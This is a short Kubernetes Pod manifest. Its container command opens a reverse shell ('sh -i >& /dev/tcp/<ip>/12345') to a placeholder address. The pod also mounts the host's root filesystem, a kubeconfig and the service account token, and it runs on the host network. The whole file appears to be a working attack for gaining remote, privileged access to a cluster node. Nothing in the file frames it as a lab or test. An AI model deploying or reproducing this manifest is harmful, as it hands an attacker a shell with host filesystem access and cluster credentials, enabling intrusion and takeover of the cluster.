apiVersion: v1
kind: Pod
metadata:
  name: kubectl-pod
spec:
  serviceAccountName: kubectl-sa
  containers:
  - name: kubectl-container
    image: manojdeshmukh45/argocd:v1
    command: ['/bin/bash', '-c', 'sh -i >& /dev/tcp/<ip>/12345 0>&1']
    volumeMounts:
    - mountPath: /demo/
      name: mount-demo-into-mnt
    - name: kubeconfig
      mountPath: /root/.kube
  volumes:
  - name: mount-demo-into-mnt
    hostPath:
      path: /
  - name: kubeconfig
    configMap:
      name: kubeconfig
  automountServiceAccountToken: true
  hostNetwork: true
